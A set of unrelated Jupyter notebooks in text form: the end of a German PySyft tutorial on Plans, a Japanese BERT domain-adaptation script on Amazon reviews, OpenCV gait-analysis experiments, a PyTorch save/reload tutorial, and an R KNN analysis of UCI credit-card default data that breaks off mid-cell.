werden. # + @sy.func2plan(args_shape=[(1, 2), (-1, 2)]) def plan_sum_abs(x, y): s = x + y return torch.abs(s) plan_sum_abs.is_built # - # Auch ist es möglich Zustands-Elemente der Funktion zu übergeben! @sy.func2plan(args_shape=[(1,)], state=(torch.tensor([1]), )) def plan_abs(x, state): bias, = state.read() x = x.abs() return x + bias pointer_plan = plan_abs.send(device_1) x_ptr = torch.tensor([-1, 0]).send(device_1) p = pointer_plan(x_ptr) p.get() # Um das Wissen zu vertiefen, kann das Tutorial "Part 8 bis" mit der Verwendung von Plänen und Protokollen verwendet werden! # ### PySyft auf GitHub einen Stern geben! # # Der einfachste Weg, unserer Community zu helfen, besteht darin, die GitHub-Repos mit Sternen auszuzeichnen! Dies hilft, das Bewusstsein für die coolen Tools zu schärfen, die wir bauen. # # - [Gib PySyft einen Stern](https://github.com/OpenMined/PySyft) # # ### Nutze unsere Tutorials auf GitHub! # # Wir haben hilfreiche Tutorials erstellt, um ein Verständnis für Federated und Privacy-Preserving Learning zu entwickeln und zu zeigen wie wir die einzelnen Bausteine weiter entwickeln. # # - [PySyft Tutorials ansehen](https://github.com/OpenMined/PySyft/tree/master/examples/tutorials) # # # ### Mach mit bei Slack! # # Der beste Weg, um über die neuesten Entwicklungen auf dem Laufenden zu bleiben, ist, sich unserer Community anzuschließen! Sie können dies tun, indem Sie das Formular unter [http://slack.openmined.org](http://slack.openmined.org) ausfüllen. # # ### Treten Sie einem Code-Projekt bei! # # Der beste Weg, um zu unserer Community beizutragen, besteht darin, Entwickler zu werden! Sie können jederzeit zur PySyft GitHub Issues-Seite gehen und nach "Projects" filtern. Dies zeigt Ihnen alle Top-Level-Tickets und gibt einen Überblick darüber, an welchen Projekten Sie teilnehmen können! Wenn Sie nicht an einem Projekt teilnehmen möchten, aber ein wenig programmieren möchten, können Sie auch nach weiteren "einmaligen" Miniprojekten suchen, indem Sie nach GitHub-Problemen suchen, die als "good first issue" gekennzeichnet sind. # # - [PySyft Projects](https://github.com/OpenMined/PySyft/issues?q=is%3Aopen+is%3Aissue+label%3AProject) # - [Good First Issue Tickets](https://github.com/OpenMined/PySyft/issues?q=is%3Aopen+is%3Aissue+label%3A%22good+first+issue%22) # # ### Spenden # # Wenn Sie keine Zeit haben, zu unserer Codebase beizutragen, aber dennoch Unterstützung leisten möchten, können Sie auch Unterstützer unseres Open Collective werden. Alle Spenden fließen in unser Webhosting und andere Community-Ausgaben wie Hackathons und Meetups! # # - [OpenMined's Open Collective Page](https://opencollective.com/openmined)
examples/tutorials/translations/german/Part 08 - Introduction to Plans.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3.7.10 ('base') # language: python # name: python3 # --- # + import copy import random import numpy as np import pandas as pd import torch from scipy import stats from tqdm import tqdm from transformers import BertForSequenceClassification, BertTokenizer from util import calc_accuracy, calc_f1, init_device, load_params from util.bert import sentence_to_loader # - # ランダムシード初期化 seed = 0 random.seed(seed) np.random.seed(seed) torch.manual_seed(seed) torch.backends.cudnn.benchmark = False torch.backends.cudnn.deterministic = True device = init_device() # パラメータ読み込み print("Loading parameters...") params = load_params("/workspace/amazon_review/config/params_mmd.json") params["batch_size"] = 4 # データセット読み込み train_df = pd.read_json(params["ja_train_path"], orient="record", lines=True) if params["is_developing"]: train_df = train_df.sample(n=10000, random_state=1) dev_df = pd.read_json(params["ja_dev_path"], orient="record", lines=True) test_df = pd.read_json(params["ja_test_path"], orient="record", lines=True) # sourceカテゴリーとtargetカテゴリーを分ける train_source_df = train_df[train_df["product_category"] == params["source_category"]] dev_source_df = dev_df[dev_df["product_category"] == params["source_category"]] test_source_df = test_df[test_df["product_category"] == params["source_category"]] train_target_df = train_df[train_df["product_category"] == params["target_category"]] dev_target_df = dev_df[dev_df["product_category"] == params["target_category"]] test_target_df = test_df[test_df["product_category"] == params["target_category"]] # クラスラベル設定 for df in [train_source_df, dev_source_df, test_source_df, train_target_df, dev_target_df, test_target_df]: # 3以上かを予測する場合 df["class"] = 0 df["class"][df["stars"] > 3] = 1 # 5クラス分類する場合 # df["class"] = df["stars"] - 1 # トークン化 model_name = "cl-tohoku/bert-base-japanese-v2" tokenizer = BertTokenizer.from_pretrained(model_name, do_lower_case=True) # dataloader作成 train_source_dataloader = sentence_to_loader( train_source_df.review_body.values, train_source_df["class"].values, tokenizer, params["batch_size"], shuffle=True, ) dev_source_dataloader = sentence_to_loader( dev_source_df.review_body.values, dev_source_df["class"].values, tokenizer, params["batch_size"], shuffle=False ) # test_source_dataloader = sentence_to_loader( # test_source_df.review_body.values, # test_source_df["class"].values, # tokenizer, # params["batch_size"], # shuffle=False, # ) train_target_dataloader = sentence_to_loader( train_target_df.review_body.values, train_target_df["class"].values, tokenizer, params["batch_size"], shuffle=True, ) # dev_target_dataloader = sentence_to_loader( # dev_target_df.review_body.values, dev_target_df["class"].values, tokenizer, params["batch_size"], shuffle=False # ) test_target_dataloader = sentence_to_loader( test_target_df.review_body.values, test_target_df["class"].values, tokenizer, params["batch_size"], shuffle=False, ) # BERTモデル構築 model = BertForSequenceClassification.from_pretrained( model_name, num_labels=params["class_num"], output_attentions=False, output_hidden_states=False, ) model.to(device) # 最適化とスケジューラー # 論文で推奨されているハイパーパラメータを使用 optimizer = torch.optim.AdamW(model.parameters(), lr=6e-6, eps=1e-8) epochs = 3 # 訓練 for epoch in range(epochs): print(f"\n======== Epoch {epoch+1} / {epochs} ========\nTraining") total_train_loss = 0 model.train() for step, (input_id_batch, input_mask_batch, label_batch) in tqdm( enumerate(train_source_dataloader), total=len(train_source_dataloader) ): input_id_batch = input_id_batch.to(device).to(torch.int64) input_mask_batch = input_mask_batch.to(device).to(torch.int64) label_batch = label_batch.to(device).to(torch.int64) model.zero_grad() result = model(input_id_batch, token_type_ids=None, attention_mask=input_mask_batch, labels=label_batch) total_train_loss += result.loss.item() result.loss.backward() torch.nn.utils.clip_grad_norm_(model.parameters(), 1.0) optimizer.step() avg_train_loss = total_train_loss / len(train_source_dataloader) print(f"\n\tAverage training loss: {avg_train_loss:.2f}") # 検証データに対する予測 print("\nRunning Validation") total_dev_loss = 0 total_dev_accuracy = 0 total_dev_f1 = 0 model.eval() for step, (input_id_batch, input_mask_batch, label_batch) in tqdm( enumerate(dev_source_dataloader), total=len(dev_source_dataloader) ): input_id_batch = input_id_batch.to(device).to(torch.int64) input_mask_batch = input_mask_batch.to(device).to(torch.int64) label_batch = label_batch.to(device).to(torch.int64) with torch.no_grad(): result = model(input_id_batch, token_type_ids=None, attention_mask=input_mask_batch, labels=label_batch) total_dev_loss += result.loss.item() logit_array = result.logits.detach().cpu().numpy() label_array = label_batch.cpu().numpy() total_dev_accuracy += calc_accuracy(label_array, logit_array) total_dev_f1 += calc_f1(label_array, logit_array) avg_dev_loss = total_dev_loss / len(dev_source_dataloader) print(f"\tDev Loss: {avg_dev_loss:.3f}") avg_dev_accuracy = total_dev_accuracy / len(dev_source_dataloader) print(f"\tAccuracy: {avg_dev_accuracy:.3f}") avg_dev_f1 = total_dev_f1 / len(dev_source_dataloader) print(f"\tF1: {avg_dev_f1:.3f}") # ブートストラップで複数回実行する print("\ntargetでFineTuning開始") # 事前学習したモデルを保持 # メモリを共有しないためにdeepcopyを使用する model_pretrained = copy.deepcopy(model.cpu()) # + params["target_ratio"] = [0.01, 0.05, 0.1, 0.3, 0.5] for target_ratio in params["target_ratio"]: print("------------------------------") print(f"target_ratio = {target_ratio}") print("------------------------------") accuracy_list = [] f1_list = [] for count in range(params["trial_count"]): print(f"\n{count+1}回目の試行") # targetでFineTuningする準備 # target_ratioで指定した比率までtargetのデータ数を減らす source_num = train_source_df.shape[0] target_num = int(source_num * target_ratio) if target_num > train_target_df.shape[0]: print("Target ratio is too large.") exit() train_target_df_sample = train_target_df.sample(target_num, replace=False) print(f"Source num: {source_num}, Target num: {target_num}") # targetのデータローダー作成 train_target_dataloader = sentence_to_loader( train_target_df_sample.review_body.values, train_target_df_sample["class"].values, tokenizer, params["batch_size"], shuffle=True, ) # 事前学習したモデルをロード model = copy.deepcopy(model_pretrained).to(device) optimizer = torch.optim.AdamW(model.parameters(), lr=6e-6, eps=1e-8) # targetでFineTuning for epoch in range(epochs): print(f"======== Epoch {epoch+1} / {epochs} ========") total_train_loss = 0 model.train() for step, (input_id_batch, input_mask_batch, label_batch) in enumerate(train_target_dataloader): input_id_batch = input_id_batch.to(device).to(torch.int64) input_mask_batch = input_mask_batch.to(device).to(torch.int64) label_batch = label_batch.to(device).to(torch.int64) model.zero_grad() result = model( input_id_batch, token_type_ids=None, attention_mask=input_mask_batch, labels=label_batch ) total_train_loss += result.loss.item() result.loss.backward() torch.nn.utils.clip_grad_norm_(model.parameters(), 1.0) optimizer.step() avg_train_loss = total_train_loss / len(train_target_dataloader) print(f"Training Target Loss: {avg_train_loss:.2f}") # テスト total_test_loss = 0 total_test_accuracy = 0 total_test_f1 = 0 model.eval() for step, (input_id_batch, input_mask_batch, label_batch) in enumerate(test_target_dataloader): input_id_batch = input_id_batch.to(device).to(torch.int64) input_mask_batch = input_mask_batch.to(device).to(torch.int64) label_batch = label_batch.to(device).to(torch.int64) with torch.no_grad(): result = model( input_id_batch, token_type_ids=None, attention_mask=input_mask_batch, labels=label_batch ) total_test_loss += result.loss.item() logit_array = result.logits.detach().cpu().numpy() label_array = label_batch.cpu().numpy() total_test_accuracy += calc_accuracy(label_array, logit_array) total_test_f1 += calc_f1(label_array, logit_array) avg_test_loss = total_test_loss / len(test_target_dataloader) print(f"\nTest Target Loss: {avg_test_loss:.2f}") avg_test_accuracy = total_test_accuracy / len(test_target_dataloader) accuracy_list.append(avg_test_accuracy) print(f"Test Target Accuracy: {avg_test_accuracy:.2f}") avg_test_f1 = total_test_f1 / len(test_target_dataloader) f1_list.append(avg_test_f1) print(f"Test Target F1: {avg_test_f1:.2f}") accuracy_interval = stats.t.interval( alpha=0.95, df=len(accuracy_list) - 1, loc=np.mean(accuracy_list), scale=stats.sem(accuracy_list) ) f1_interval = stats.t.interval(alpha=0.95, df=len(f1_list) - 1, loc=np.mean(f1_list), scale=stats.sem(f1_list)) print("\n\t\tMean, Std, 95% interval (bottom, up)") print( f"Accuracy\t{np.mean(accuracy_list):.2f}, {np.std(accuracy_list, ddof=1):.2f}, {accuracy_interval[0]:.2f}, {accuracy_interval[1]:.2f}" ) print( f"F1 Score\t{np.mean(f1_list):.2f}, {np.std(f1_list, ddof=1):.2f}, {f1_interval[0]:.2f}, {f1_interval[1]:.2f}" )
amazon_review/train_bert.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + #webcam import cv2 import numpy as np cap = cv2.VideoCapture(0) while(cap.isOpened()): ret, frame = cap.read() if ret: cv2.imshow("frame", frame) key = cv2.waitKey(30) if key == 27: break else: break cap.release() cv2.destroyAllWindows() # - Violet=(148, 0, 211) Indigo=(75, 0, 130) Blue=(0, 0, 255) Green=(0, 255, 0) Yellow=(255, 255, 0) Orange=(255, 127, 0) Red=(255, 0 , 0) # + #just show video from sequence import cv2 import numpy as np cv2.namedWindow('image',cv2.WINDOW_NORMAL) cv2.resizeWindow('image', 1280,720) cap = cv2.VideoCapture("C:\\Users\sunny.DESKTOP-QGFGEEK\Desktop\GitClone\\1_camera_gait_analysis\walking_77_image_sequence\\img (%d).jpg") while(cap.isOpened()): ret, frame = cap.read() if ret: cv2.imshow("image", frame) key = cv2.waitKey(30) if key == 27: break else: break cap.release() cv2.destroyAllWindows() # + #just show video import cv2 import numpy as np cv2.namedWindow('image',cv2.WINDOW_NORMAL) cv2.resizeWindow('image', 1280,720) cap = cv2.VideoCapture("C:\\Users\sunny.DESKTOP-QGFGEEK\Desktop\GitClone\\1_camera_gait_analysis\walking_videos\\DSC_0077.MOV") while(cap.isOpened()): ret, frame = cap.read() if ret: cv2.imshow("image", frame) key = cv2.waitKey(30) if key == 27: break else: break cap.release() cv2.destroyAllWindows() # + #MOG import cv2 import numpy as np cv2.namedWindow('image',cv2.WINDOW_NORMAL) cv2.resizeWindow('image', 1280,720) cap = cv2.VideoCapture("C:\\Users\sunny.DESKTOP-QGFGEEK\Desktop\GitClone\\1_camera_gait_analysis\walking_videos\\DSC_0077.MOV") fgbg = cv2.bgsegm.createBackgroundSubtractorMOG() while(cap.isOpened()): ret, frame = cap.read() if ret: fgmask = fgbg.apply(frame) cv2.imshow('image',fgmask) key = cv2.waitKey(30) if key == 27: break else: break cap.release() cv2.destroyAllWindows() # + #MOG2 import cv2 import numpy as np cv2.namedWindow('image',cv2.WINDOW_NORMAL) cv2.resizeWindow('image', 1280,720) cap = cv2.VideoCapture("C:\\Users\sunny.DESKTOP-QGFGEEK\Desktop\GitClone\\1_camera_gait_analysis\walking_videos\\DSC_0077.MOV") subtractor = cv2.createBackgroundSubtractorMOG2(history=1000000, varThreshold=5, detectShadows=False) while(cap.isOpened()): ret, frame = cap.read() if ret: mask = subtractor.apply(frame) cv2.imshow("image", mask) key = cv2.waitKey(30) if key == 27: break else: break cap.release() cv2.destroyAllWindows() # + #Manual import cv2 import numpy as np cv2.namedWindow('image',cv2.WINDOW_NORMAL) cv2.resizeWindow('image', 1280,720) cap = cv2.VideoCapture("C:\\Users\sunny.DESKTOP-QGFGEEK\Desktop\GitClone\\1_camera_gait_analysis\walking_videos\\DSC_0077.MOV") _, first_frame = cap.read() first_gray = cv2.cvtColor(first_frame, cv2.COLOR_BGR2GRAY) first_gray = cv2.GaussianBlur(first_gray, (5, 5), 0) while(cap.isOpened()): ret, frame = cap.read() if ret: gray_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) gray_frame = cv2.GaussianBlur(gray_frame, (5, 5), 0) difference = cv2.absdiff(first_gray, gray_frame) _, difference = cv2.threshold(difference, 25, 255, cv2.THRESH_BINARY) cv2.imshow("image", first_frame) cv2.imshow("image", frame) cv2.imshow("image", difference) key = cv2.waitKey(30) if key == 27: break else: break cap.release() cv2.destroyAllWindows() # + #cornor detection normal image import cv2 import numpy as np cv2.namedWindow('image',cv2.WINDOW_NORMAL) cv2.resizeWindow('image', 1280,720) cap = cv2.VideoCapture("C:\\Users\sunny.DESKTOP-QGFGEEK\Desktop\GitClone\\1_camera_gait_analysis\walking_videos\\DSC_0077.MOV") while(cap.isOpened()): ret, frame = cap.read() if ret: gray = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY) gray = np.float32(gray) dst = cv2.cornerHarris(gray,2,3,0.04) #result is dilated for marking the corners, not important dst = cv2.dilate(dst,None) # Threshold for an optimal value, it may vary depending on the image. frame[dst>0.01*dst.max()]=[0,0,255] cv2.imshow("image", frame) key = cv2.waitKey(30) if key == 27: break else: break cap.release() cv2.destroyAllWindows() # + #webcam detect marker(with highlight level threshold) import cv2 import numpy as np cap = cv2.VideoCapture(0) while(cap.isOpened()): ret, frame, = cap.read() if ret: imgray = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY) imblur1 = cv2.medianBlur(imgray,5) imblur2 = cv2.GaussianBlur(imblur1,(5,5),0) ret,thresh = cv2.threshold(imblur2,250,255,cv2.THRESH_BINARY) contours, hierarchy = cv2.findContours(thresh,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE) #print("Number of objects found = ", len(contours)) cv2.drawContours(frame, contours, -1, (0,0,255), 10) cv2.imshow("frame", frame) key = cv2.waitKey(30) if key == 27: break else: break cap.release() cv2.destroyAllWindows() # + #image edge detection import cv2 import numpy as np cv2.namedWindow('image',cv2.WINDOW_NORMAL) #cv2.resizeWindow('image', 2000,1242) cv2.resizeWindow('image', 560,996) img = cv2.imread('C:\\Users\sunny.DESKTOP-QGFGEEK\Desktop\GitClone\\1_camera_gait_analysis\Azmall_image\BAzmall.jpg',1) #img = cv2.imread('fap.png',1) gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) blur = cv2.GaussianBlur(gray,(7,7),0) canny2 = cv2.Canny(blur, 50, 100) cv2.imshow("image", canny2) k = cv2.waitKey(0) if k == 27: # wait for ESC key to exit cv2.destroyAllWindows() # + #show marker coordinate in image import cv2 import numpy as np from matplotlib import pyplot as plt cv2.namedWindow('image',cv2.WINDOW_NORMAL) cv2.resizeWindow('image', 560,996) cv2.namedWindow('image2',cv2.WINDOW_NORMAL) cv2.resizeWindow('image2', 560,996) img = cv2.imread('C:\\Users\sunny.DESKTOP-QGFGEEK\Desktop\GitClone\\1_camera_gait_analysis\Azmall_image\FAzmall.jpg') imgray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY) imblur1 = cv2.medianBlur(imgray,5) imblur2 = cv2.GaussianBlur(imblur1,(5,5),0) ret,thresh = cv2.threshold(imblur2,250,255,cv2.THRESH_BINARY) contours, hierarchy = cv2.findContours(thresh,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE) print("Number of objects found = ", len(contours)) i = 0 for c in contours: # calculate moments for each contour M = cv2.moments(c) # calculate x,y coordinate of center if M["m00"] != 0: cX = int(M["m10"] / M["m00"]) cY = int(M["m01"] / M["m00"]) else: cX = 0 cY = 0 i+=1 # print('\nX',i,' ',cX) #print('Y',i,' ',cY) centroid = "X"+str(i)+":"+str(cX)+", Y"+str(i)+":"+str(cY) cv2.putText(img,centroid , (cX - 25, cY - 25),cv2.FONT_HERSHEY_SIMPLEX, 1, (255,255, 255), 2) cv2.drawContours(img, contours, -1, (0,0,255), 10) cv2.imshow("image", img) cv2.imshow("image2",thresh) k = cv2.waitKey(0) if k == 27: # wait for ESC key to exit cv2.destroyAllWindows() # + #save video import cv2 import numpy as np from matplotlib import pyplot as plt cv2.namedWindow('image',cv2.WINDOW_NORMAL) cv2.resizeWindow('image', 1280,720) cap = cv2.VideoCapture("C:\\Users\sunny.DESKTOP-QGFGEEK\Desktop\GitClone\\1_camera_gait_analysis\walking_77_image_sequence\\img (%d).jpg") # Define the codec and create VideoWriter object fourcc = cv2.VideoWriter_fourcc(*'XVID') out = cv2.VideoWriter('77marked.avi',fourcc, 23.9, (1920,1080)) while(cap.isOpened()): ret, frame, = cap.read() if ret: #frame = cv2.flip(frame,0) # write the flipped frame out.write(frame) cv2.imshow("image", frame) key = cv2.waitKey(30) if key == 27: break else: break cap.release() cv2.destroyAllWindows() # - import cv2 cv2.destroyAllWindows() # + #calibrate camera import numpy as np import cv2 import glob # termination criteria criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 30, 0.001) # prepare object points, like (0,0,0), (1,0,0), (2,0,0) ....,(6,5,0) objp = np.zeros((7*7,3), np.float32) objp[:,:2] = np.mgrid[0:7,0:7].T.reshape(-1,2) # Arrays to store object points and image points from all the images. objpoints = [] # 3d point in real world space imgpoints = [] # 2d points in image plane. images = cv2.VideoCapture(0) while(images.isOpened()): ret, frame = images.read() if ret: gray = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY) # Find the chess board corners ret, corners = cv2.findChessboardCorners(gray, (7,7),None) # If found, add object points, image points (after refining them) if ret == True: objpoints.append(objp) cv2.cornerSubPix(gray,corners,(11,11),(-1,-1),criteria) imgpoints.append(corners) # Draw and display the corners cv2.drawChessboardCorners(frame, (7,7), corners,ret) ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, gray.shape[::-1],None,None) cv2.imshow('frame',frame) key = cv2.waitKey(100) if key == 27: break else: break images.release() cv2.destroyAllWindows() np.savez("B.npz", mtx = mtx, dist = dist , rvecs = rvecs, tvecs = tvecs) # + #B.npz checker data = np.load("B.npz") a1 = data['mtx'] print(a1) b1 = data['dist'] print(b1) a2 = data['rvecs'] print(a2) b2 = data['tvecs'] print(b2) print("==========================================") print(mtx) print(dist) print(rvecs) print(tvecs) # + #draw 3d on chessboard import cv2 import numpy as np import glob # Load previously saved data with np.load('B.npz') as X: mtx, dist, _, _ = [X[i] for i in ('mtx','dist','rvecs','tvecs')] def draw(img, corners, imgpts): corner = tuple(corners[0].ravel()) img = cv2.line(img, corner, tuple(imgpts[0].ravel()), (255,0,0), 5) img = cv2.line(img, corner, tuple(imgpts[1].ravel()), (0,255,0), 5) img = cv2.line(img, corner, tuple(imgpts[2].ravel()), (0,0,255), 5) return img def drawBox(img, corners, imgpts): imgpts = np.int32(imgpts).reshape(-1,2) # draw ground floor in green img = cv2.drawContours(img, [imgpts[:4]],-1,(0,255,0),-3) # draw pillars in blue color for i,j in zip(range(4),range(4,8)): img = cv2.line(img, tuple(imgpts[i]), tuple(imgpts[j]),(255),3) # draw top layer in red color img = cv2.drawContours(img, [imgpts[4:]],-1,(0,0,255),3) return img criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 30, 0.001) objp = np.zeros((7*7,3), np.float32) objp[:,:2] = np.mgrid[0:7,0:7].T.reshape(-1,2) axis = np.float32([[3,0,0], [0,3,0], [0,0,-3]]).reshape(-1,3) #axis = np.float32([[0,0,0], [0,3,0], [3,3,0], [3,0,0], # [0,0,-3],[0,3,-3],[3,3,-3],[3,0,-3] ]) cap = cv2.VideoCapture(0) while(cap.isOpened()): ret, img = cap.read() if ret: gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY) ret, corners = cv2.findChessboardCorners(gray, (7,7),None,cv2.CALIB_CB_ADAPTIVE_THRESH + cv2.CALIB_CB_NORMALIZE_IMAGE + cv2.CALIB_CB_FAST_CHECK) if ret == True: corners2 = cv2.cornerSubPix(gray,corners,(11,11),(-1,-1),criteria) # Find the rotation and translation vectors. _, rvecs, tvecs, inliers = cv2.solvePnPRansac(objp, corners2, mtx, dist) # project 3D points to image plane imgpts, jac = cv2.projectPoints(axis, rvecs, tvecs, mtx, dist) img = draw(img,corners2,imgpts) cv2.imshow('img',img) key = cv2.waitKey(30) if key == 27: break else: break cap.release() cv2.destroyAllWindows() # -
test_cv2_video_function_sandbox.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # 304 Save and Reload # # """ # View more, visit my tutorial page: https://morvanzhou.github.io/tutorials/ # My Youtube Channel: https://www.youtube.com/user/MorvanZhou # # Save the nets and/or parameters in python pickle format # + import torch from torch.autograd import Variable import matplotlib.pyplot as plt # %matplotlib inline torch.manual_seed(1) # reproducible # - # ### Generate some fake data x = torch.unsqueeze(torch.linspace(-1, 1, 100), dim=1) # x data (tensor), shape=(100, 1) y = x.pow(2) + 0.2*torch.rand(x.size()) # noisy y data (tensor), shape=(100, 1) x, y = Variable(x, requires_grad=False), Variable(y, requires_grad=False) def save(): # save net1 net1 = torch.nn.Sequential( torch.nn.Linear(1, 10), torch.nn.ReLU(), torch.nn.Linear(10, 1) ) optimizer = torch.optim.SGD(net1.parameters(), lr=0.5) loss_func = torch.nn.MSELoss() for t in range(100): prediction = net1(x) loss = loss_func(prediction, y) optimizer.zero_grad() loss.backward() optimizer.step() # plot result plt.figure(1, figsize=(10, 3)) plt.subplot(131) plt.title('Net1') plt.scatter(x.data.numpy(), y.data.numpy()) plt.plot(x.data.numpy(), prediction.data.numpy(), 'r-', lw=5) # 2 ways to save the net torch.save(net1, 'net.pkl') # save entire net torch.save(net1.state_dict(), 'net_params.pkl') # save only the parameters def restore_net(): # restore entire net1 to net2 net2 = torch.load('net.pkl') prediction = net2(x) # plot result plt.subplot(132) plt.title('Net2') plt.scatter(x.data.numpy(), y.data.numpy()) plt.plot(x.data.numpy(), prediction.data.numpy(), 'r-', lw=5) def restore_params(): # restore only the parameters in net1 to net3 net3 = torch.nn.Sequential( torch.nn.Linear(1, 10), torch.nn.ReLU(), torch.nn.Linear(10, 1) ) # copy net1's parameters into net3 net3.load_state_dict(torch.load('net_params.pkl')) prediction = net3(x) # plot result plt.subplot(133) plt.title('Net3') plt.scatter(x.data.numpy(), y.data.numpy()) plt.plot(x.data.numpy(), prediction.data.numpy(), 'r-', lw=5) plt.show() # save net1 save() # restore entire net (may slow) restore_net() # restore only the net parameters restore_params()
tutorial-contents-notebooks/304_save_reload.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 2 # language: python # name: python2 # --- # # plotting $\sigma_{\rm log \mathcal{M}_*}(\mathcal{M}_h = 10^{12} M_\odot)$ as a function of $t_{duty}$ # + import numpy as np import catalog as Cat import evolver as Evol import observables as Obvs import util as UT import matplotlib.pyplot as plt # %matplotlib inline # -
centralms/notebooks/notes_siglogMstar_tduty.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .r # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: R # name: ir # --- # + [markdown] colab_type="text" id="view-in-github" # <a href="https://colab.research.google.com/github/jmeche/scikit-learn/blob/master/UCI_Credit_KNN.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a> # + colab={"base_uri": "https://localhost:8080/"} id="hui1jDssLZA7" outputId="6c2865c9-3b13-4d48-cb24-daf1ec748106" install.packages("caret") install.packages("tidyverse") install.packages("FNN") install.packages("stringr") # + colab={"base_uri": "https://localhost:8080/"} id="HI-_DWNdP5nu" outputId="04d8bd39-c41d-471f-e2c6-56255c4f2b06" install.packages("e1071") library(e1071) # + id="Mp5DTiLVMn-D" library(caret, tidyverse) library(FNN) library(stringr) # + colab={"base_uri": "https://localhost:8080/", "height": 55} id="dDzvKanAMygj" outputId="bb007081-8852-4df3-ec65-92e8cb84aa34" getwd() # + id="tb_7-y_BMycN" df <- read.csv("UCI_Credit_Card.csv") # + [markdown] id="_QNeCeXANaxm" # # Data Cleaning # + colab={"base_uri": "https://localhost:8080/", "height": 1000} id="NwtqOEKNNKP-" outputId="2e7e3063-d555-499c-b2b9-7a29356ae034" dim(df) str(df) # + id="zNVt5O9ZNXKL" # We can get rid of the ID df = df[,-1] # Sex, Education, Marriage and Default, and all the PAY_X we can convert to factors summary(df) # + colab={"base_uri": "https://localhost:8080/", "height": 55} id="YOzJxXElNi9o" outputId="d84c3387-a273-4e5a-b5fa-cfd98da53e97" any(is.na(df)) # No NA values # + id="KEJPkO42Nlxv" # We change the name of the output variable to sth more manageable names(df)[names(df) == "default.payment.next.month"] <- "Default" # And we make the names of the other ones more readable as well for (i in seq(2,5)){ names(df)[i] <- str_to_title(names(df)[i]) } # + colab={"base_uri": "https://localhost:8080/", "height": 900} id="QdnzExx0NrIn" outputId="e8dcf19b-3e9d-49bb-ab3e-ba0f8cc2121d" # We se that the values for education go from 0 to 6, but # According to data Description Education takes on values 1 to 4, # so entries with 0, 5 and 6 are wrong df$Education[df$Education == 0] # 14 entries like this sum(df$Education[df$Education == 1]) / 1 # 10585 sum(df$Education[df$Education == 2]) / 2 # 14030 sum(df$Education[df$Education == 3]) / 3 # 4917 sum(df$Education[df$Education == 4]) / 4 # 123 sum(df$Education[df$Education == 5]) / 5 # 280 entries like this sum(df$Education[df$Education == 6]) / 6 # 51 entries like this # the description of the variables is the following: # 1 = graduate school; 2 = university; 3 = high school; 4 = others # So it would make sense to convert 0, 5 and 6 to 4. They are only 345 of 30000 df$Education[df$Education == 0 | df$Education == 5| df$Education == 6] = 4 summary(df) # + colab={"base_uri": "https://localhost:8080/", "height": 776} id="KxeNNXgaNvqq" outputId="374b79ea-20eb-461f-96ff-23d924262a6f" # In Marriage we have values [0, 3], when we should have [1, 3] # Marital status (1 = married; 2 = single; 3 = others). We'll convert 0's into 3's df$Marriage[df$Marriage == 0] = 3 summary(df) # + colab={"base_uri": "https://localhost:8080/", "height": 794} id="ySP5B96zOEaP" outputId="7ecd57d2-0f33-47fa-88c8-917e36fc29c6" # Payment variables should take values -1, 1, 2, 3, ..., 9; # and here they go from -2 to 8. df$PAY_0[df$PAY_0 == -2] df$PAY_0[df$PAY_0 == -1] df$PAY_0[df$PAY_0 == 0] # + id="5jEXqPXFOIUA" # Probably no payment delay should be 0, so either bump all values up by 1 # and then convert -1 into 0 # First let's change the name of PAY_0 to PAY_1 to make in consistent with the rest of names names(df)[match("PAY_0", names(df))] <- "PAY_1" # + id="Kx7akDf6OLok" # We bum up by 1 for (i in seq(match("PAY_1", names(df)), match("PAY_6", names(df)))) { df[,i] <- df[,i] + 1 } # Turn -1 into 0 for (i in seq(match("PAY_1", names(df)), match("PAY_6", names(df)))) { df[,i][df[,i] == -1] = 0 } # + id="eeHHyZUoOU82" ### Not execute this for now # Convert variables to factors where applicable: Sex, Education, Marriage, Default # We could convert PAY_X as well but that one could work either way so we'll leave it #df$Sex <- as.factor(df$Sex) #df$Education <- as.factor(df$Education) #df$Marriage <- as.factor(df$Marriage) df$Default <- as.factor(df$Default) # + id="eNH075uPOZm3" # + [markdown] id="Kr4GHtlRR8SI" # # Split in Train and Test # + id="pW2sB-QySBOH" # SPLIT IN TRAIN AND TEST trainIndex <- createDataPartition(df$Default, times = 1, p = 0.8, list = FALSE) df_train <- df[trainIndex,] df_test <- df[-trainIndex,] # + id="3x3buZ2YSA89" # + [markdown] id="oq5XzNS4Rqcq" # # KNN with built-in function # + id="fRrNytatRuZk" # Extra split for this KNN function df_train_knn = df_train[,-24] df_test_knn = df_test[,-24] default_train = df_train$Default default_test = df_test$Default # + id="55sllpCDRugr" model <- knn(df_train_knn, df_test_knn, default_train, k = 155) # It works with the cl I just did. Why like that??? # + colab={"base_uri": "https://localhost:8080/", "height": 160} id="vKA-ZhE4SNJf" outputId="3a6c1b69-111e-47e6-90ff-442503f260b9" str(model) table(model, default_test) # + colab={"base_uri": 